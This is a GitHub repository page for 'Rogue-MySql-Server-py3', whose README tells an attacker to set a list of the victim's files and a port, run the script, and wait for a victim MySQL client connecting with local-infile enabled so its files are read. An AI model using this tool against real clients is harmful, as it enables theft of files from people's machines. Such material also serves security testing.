Skip to content

r3x5ur/Rogue-MySql-Server-py3

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Rogue-MySql-Server for Python3.x

Rogue MySql Server for Python3.x

Step

  • Modify FILELIST of rogue_mysql_server.py to read the victim's file, modify PORT to modify the listening port
  • Continuous triggering will sequentially obtain the files in FILELIST
  • attacker exec python rogue_mysql_server.py
  • victim exec like mysql.exe -h 127.0.0.1 -u root -p123 --enable-local-infile --ssl-mode=DISABLED

Screenshots


  • victim origin file image

  • victim image

  • attacker image

About

Rogue MySql Server for Python3+

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%